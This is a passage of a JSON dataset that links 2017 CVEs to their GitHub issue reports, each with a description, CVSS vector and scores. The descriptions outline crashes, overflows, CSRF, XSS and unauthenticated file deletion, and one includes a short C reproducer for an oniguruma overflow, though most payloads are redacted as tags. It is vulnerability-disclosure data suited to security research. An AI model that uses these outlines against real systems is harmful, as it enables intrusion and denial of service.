        "Issue_Created_At": "2017-04-28T15:47:20Z",
        "description": "Segmentation faults in mime handling. Hello, I was using American Fuzzy Lop (afl fuzz) to fuzz input to the mime parse test program. Is fixing these crashes something you're interested in? The input files can be found here: URLTAG The files can be executed as APITAG to cause seg faults. Let me know if I can provide any more information to help narrow down this issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8827",
        "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/75",
        "Issue_Url_new": "https://github.com/semplon/genixcms/issues/75",
        "Repo_new": "semplon/genixcms",
        "Issue_Created_At": "2017-05-05T09:39:05Z",
        "description": "Arbitrary User Password Reset Vulnerability. FILETAG DOES NOT limits the frequency users submit the password resetting form, If an attacker sends the request consecutively in a specific time, the target user will be unable to log into his account as his password is changed frequently. POST FILETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8830",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/467",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/467",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-03T10:52:09Z",
        "description": "memory leak in APITAG APITAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: URLTAG URLTAG Author: bird APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8833",
        "Issue_Url_old": "https://github.com/zencart/zencart/issues/1431",
        "Issue_Url_new": "https://github.com/zencart/zencart/issues/1431",
        "Repo_new": "zencart/zencart",
        "Issue_Created_At": "2017-05-07T11:23:09Z",
        "description": "Version NUMBERTAG ersion NUMBERTAG Hi, I'm in your NUMBERTAG ersion open source found to FILETAG this page parameter value ID does not filter in the output or filter or escape the input character to cause XSS Poc Payload\uff1a URLTAG Resolving: Filtering encoding or escaping FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8842",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/66",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/66",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2017-03-24T15:44:45Z",
        "description": "divide by zero in APITAG (libzpaq.h). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8843",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/69",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/69",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2017-03-24T15:56:13Z",
        "description": "NULL pointer dereference in join_pthread (stream.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8844",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/70",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/70",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2017-03-24T16:08:35Z",
        "description": "heap based buffer overflow write in read NUMBERTAG g (stream.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8845",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/68",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/68",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2017-03-24T15:51:37Z",
        "description": "invalid memory read in lzo1x_decompress APITAG On NUMBERTAG ERRORTAG Reproducer: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8846",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/71",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/71",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2017-03-24T16:10:33Z",
        "description": "use after free in read_stream (stream.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8847",
        "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/67",
        "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/67",
        "Repo_new": "ckolivas/lrzip",
        "Issue_Created_At": "2017-03-24T15:46:53Z",
        "description": "NULL pointer dereference in APITAG (libzpaq.h). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8848",
        "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/16",
        "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/16",
        "Repo_new": "s3131212/allendisk",
        "Issue_Created_At": "2017-05-08T15:11:17Z",
        "description": "Change password exists CSRF Vulnerability (any change password). Version NUMBERTAG I found in your version NUMBERTAG that the change password did not produce a related token, resulting in a CSRF vulnerability Affected Files:",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8853",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/2",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/2",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2017-04-17T08:12:06Z",
        "description": "A any file delete vulnerability . I found that Fiyo CMS version NUMBERTAG has a any file delete vulnerability that do not need login. FILETAG There is not any checking about the $_POST['act'] $_POST[file] , client can control these two input to cause any file deletion . reproduce(this will delete .htaccess file): Url: URLTAG PATHTAG POST: APITAG Referrer: URLTAG Discoverer: APITAG of APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8868",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/30",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/30",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2017-05-08T10:52:28Z",
        "description": "Unprotected sqlite file deletion. There is a vulnerability in flatcore cms NUMBERTAG B NUMBERTAG which could delete APITAG file. And by exploiting this vulnerability the application won't be accessible. This vulnerability occurs because the file deletion request is just a GET request and there is no CSRF protection on the endpoint This is the request is URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8874",
        "Issue_Url_old": "https://github.com/mautic/mautic/issues/3486",
        "Issue_Url_new": "https://github.com/mautic/mautic/issues/3486",
        "Repo_new": "mautic/mautic",
        "Issue_Created_At": "2017-02-21T15:45:50Z",
        "description": "Authenticated CSRF in Delete Campaign / Contact. What type of report is this: | Q | A | | | Bug report? | Y | Feature request? | | Enhancement? | Description: Mautic suffers from autnehticated CSRF in which an attacker can trick a user/admin to delete campaigns or contacts. These two operations are not protected with an anti CSRF token. Other operations, e.g., adding contacts/campaigns are protected. If a bug: | Q | A | | | Mautic version NUMBERTAG as taken from Bitnami appliances) | PHP version | Steps to reproduce NUMBERTAG Get valid user session cookies and an ID of a campaign (or a contact NUMBERTAG Do a POST request (including the above cookies) to PATHTAG APITAG PATHTAG APITAG APITAG Replace APITAG with the ID of step NUMBERTAG Log errors: N.A.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8891",
        "Issue_Url_old": "https://github.com/dropbox/lepton/issues/87",
        "Issue_Url_new": "https://github.com/dropbox/lepton/issues/87",
        "Repo_new": "dropbox/lepton",
        "Issue_Created_At": "2017-04-01T19:51:39Z",
        "description": "SEGFAULT: Malformed lepton file generated by AFL + APITAG Hi, all. This malformed lepton file can cause crash. It can cause APITAG of lepton. Here is ASAN result and I attached the FILETAG . Thanks. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-8911",
        "Issue_Url_old": "https://github.com/verdammelt/tnef/issues/23",
        "Issue_Url_new": "https://github.com/verdammelt/tnef/issues/23",
        "Repo_new": "verdammelt/tnef",
        "Issue_Created_At": "2017-05-10T08:48:17Z",
        "description": "integer underflow in unicode_to_utf8 . tnef NUMBERTAG tnef f $file NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG B: unicode_to_utf8 APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG mapi_attr_read APITAG NUMBERTAG by NUMBERTAG BD8: parse_file APITAG NUMBERTAG by NUMBERTAG main APITAG unsigned char unicode_to_utf8 (size_t len, unsigned char buf) { int i NUMBERTAG int j NUMBERTAG unsigned char utf8 = malloc NUMBERTAG len NUMBERTAG won't get any longer than this / for (i NUMBERTAG i < len NUMBERTAG i NUMBERTAG when len is NUMBERTAG len NUMBERTAG underflow FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8929",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/658",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/658",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2017-05-12T06:39:04Z",
        "description": "Use after free in APITAG Use after free in APITAG Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-8930",
        "Issue_Url_old": "https://github.com/simpleinvoices/simpleinvoices/issues/270",
        "Issue_Url_new": "https://github.com/simpleinvoices/simpleinvoices/issues/270",
        "Repo_new": "simpleinvoices/simpleinvoices",
        "Issue_Created_At": "2017-03-20T18:00:53Z",
        "description": "CSRF in APITAG allows an attacker to take over the website. Hi everyone, I am copying here a message I sent to Richard Rowley a month ago to disclose a couple of CSRF in APITAG I assumed he was one of the developers of this project, but it looks like I was wrong. I didn't hear anything from him so I decided to open an issue here. ===== I found multiple CSRF vulnerabilities in APITAG APITAG The version of Simple Invoices that I used was taken from Bitnami. Unfortunately, it looks like they have taken it out from their library. None of the security relevant state changing operations are protected by an anti CSRF token. For example, consider the POST request to create a new administrator: POST APITAG ... [headers w/ cookies] APITAG An attacker can create an admin user with a CSRF and take over the entire website. The other operations that I have tested are (but I wouldn't exclude the presence of others): Enable/disable Paypal: APITAG Creation of new customers: APITAG Change tax rate: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8932",
        "Issue_Url_old": "https://github.com/golang/go/issues/20040",
        "Issue_Url_new": "https://github.com/golang/go/issues/20040",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2017-04-19T17:00:24Z",
        "description": "crypto/elliptic: carry bug in NUMBERTAG P NUMBERTAG Cloudflare reported a carry bug in the P NUMBERTAG implementation that they submitted for NUMBERTAG in NUMBERTAG bacfc NUMBERTAG fba4. I can reproduce this via random testing against APITAG and, after applying the patch that they provided, can no longer do so, even after NUMBERTAG APITAG NUMBERTAG APITAG iterations. This issue is not obviously exploitable, although we cannot rule out the possibility of someone managing to squeeze something through this hole. (It would be a cool paper.) Thus this should be treated as something to fix, but not something on fire, based on what we currently know. Fix will be coming in just a second.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-9072",
        "Issue_Url_old": "https://github.com/victorwon/calendarxp/issues/2",
        "Issue_Url_new": "https://github.com/victorwon/calendarxp/issues/2",
        "Repo_new": "victorwon/calendarxp",
        "Issue_Created_At": "2017-04-24T16:52:39Z",
        "description": "a placeholder for a security issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9090",
        "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/25",
        "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/25",
        "Repo_new": "s3131212/allendisk",
        "Issue_Created_At": "2017-05-10T08:06:38Z",
        "description": "Captcha Bypass Vulnerability in FILETAG . /reg.php CODETAG As with FILETAG , the following code does not check wether isset($_SESSION FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9091",
        "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/23",
        "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/23",
        "Repo_new": "s3131212/allendisk",
        "Issue_Created_At": "2017-05-10T03:04:29Z",
        "description": "Captcha Bypass Vulnerability in FILETAG . /admin/loginc.php CODETAG Note that $_SESSION FILETAG How to fix: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9093",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/26",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/26",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-05-13T18:36:03Z",
        "description": "logical bug in src/imagew jpeg.c: my_skip_input_data_fn that leads to infinite loop. Done via fuzzed JPEG FILETAG 'my_skip_input_data_fn tries to skip NUMBERTAG bytes which is bigger than the file size thus leading to infinite loop trying to reread from the buffer I believe if reading failed there isn't too much that can be done to save the situation this is my suggested edit CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9094",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/27",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/27",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-05-16T18:13:13Z",
        "description": "Another infinite loop. Unfortunately i will not be able to provide help because the problem is within internals of GIF images first I would like to say that this image is fuzzed JPEG. FILETAG however this is a backtrace for where the hanging occured CODETAG the problem isn't how is it parsed but it is that it lead to infinite loop somehow",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9110",
        "Issue_Url_old": "https://github.com/openexr/openexr/issues/232",
        "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/232",
        "Repo_new": "academysoftwarefoundation/openexr",
        "Issue_Created_At": "2017-05-23T08:00:18Z",
        "description": "Multiple segmentation faults CVETAG to CVETAG . Brandon Perry provided multiple images that can crash APITAG URLTAG The files he sent are here (along with the output of valgrind apparently) FILETAG Mitre assigned the following CVE to those issues: CVETAG CVETAG CVETAG CVETAG CVETAG CVETAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9141",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/489",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/489",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-15T18:11:32Z",
        "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in profile.c. APITAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9142",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/490",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/490",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-15T18:12:54Z",
        "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in blob.c. APITAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9143",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/456",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/456",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-28T03:59:26Z",
        "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ac in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9146",
        "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/47",
        "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/47",
        "Repo_new": "yeraze/ytnef",
        "Issue_Created_At": "2017-05-15T07:45:56Z",
        "description": "heap buffer overrun: write extra bytes in APITAG We discover a buffer over write problem in the APITAG functiion. The cause is: The checker APITAG is not valid as the pointer d is incremented during exectuion. So the correct checking should use calculated value APITAG instead of NUMBERTAG We propose a initial patch to solve it. CODETAG ERRORTAG The testcase can be downloaded here FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9224",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/57",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/57",
        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2017-05-22T07:36:55Z",
        "description": "Buffer Overflow in APITAG The buffer overflow is found with the code: ERRORTAG The asan err can be found as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9225",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/56",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/56",
        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2017-05-22T07:01:01Z",
        "description": "Buffer Overflow in APITAG This buffer overflow is found in the latest develop branch with the code: include APITAG int APITAG { regex_t reg; const APITAG inp = (const APITAG ) PATHTAG if (onig_new (&reg, inp, inp NUMBERTAG ONIG_OPTION_IGNORECASE , ONIG_ENCODING_UTF NUMBERTAG BE, ONIG_SYNTAX_DEFAULT NUMBERTAG onig_free(reg); return NUMBERTAG Error reported in asan: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc NUMBERTAG ea4 at pc NUMBERTAG f9 bp NUMBERTAG ffc NUMBERTAG aa0 sp NUMBERTAG ffc NUMBERTAG a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffc NUMBERTAG ea4 thread T NUMBERTAG f8 in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG c5 in expand_case_fold_string PATHTAG NUMBERTAG in setup_tree PATHTAG NUMBERTAG c NUMBERTAG f in onig_compile PATHTAG NUMBERTAG d NUMBERTAG in onig_new PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f4ca3cc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ec8 in _start ( PATHTAG ) Address NUMBERTAG ffc NUMBERTAG ea4 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG b in expand_case_fold_string PATHTAG This frame has NUMBERTAG object(s NUMBERTAG prev_node NUMBERTAG srem NUMBERTAG items' APITAG NUMBERTAG acc NUMBERTAG d NUMBERTAG f4 f4 f4 f3 f3 f3 f NUMBERTAG acc NUMBERTAG e NUMBERTAG acc NUMBERTAG f NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f3 f NUMBERTAG acc NUMBERTAG f3 f NUMBERTAG f1 f NUMBERTAG acc NUMBERTAG f1 f NUMBERTAG f4 f4 f4 f2 f2 f2 f NUMBERTAG f4 f4 f2 f NUMBERTAG acc NUMBERTAG f2 f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9226",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/55",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/55",
        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2017-05-18T04:28:31Z",
        "description": "Heap corruption in APITAG in NUMBERTAG encodings. This heap corruption is due to a different cause than issue NUMBERTAG and NUMBERTAG the following is found after applying the patches of both. The issue affects latest PHP NUMBERTAG installations with mbstring enabled, when the regular expression is from network, this can be considered as a security issue. Tested on NUMBERTAG bit ASAN build, one of the NUMBERTAG encodings below would cause an out of bound write: $ cat FILETAG ERRORTAG $ bin/php FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9227",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/58",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/58",
        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2017-05-22T15:23:45Z",
        "description": "Bug in mbc_enc_len. The buffer overflow is found with the following code: ERRORTAG asan error can be found: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9228",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/60",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/60",
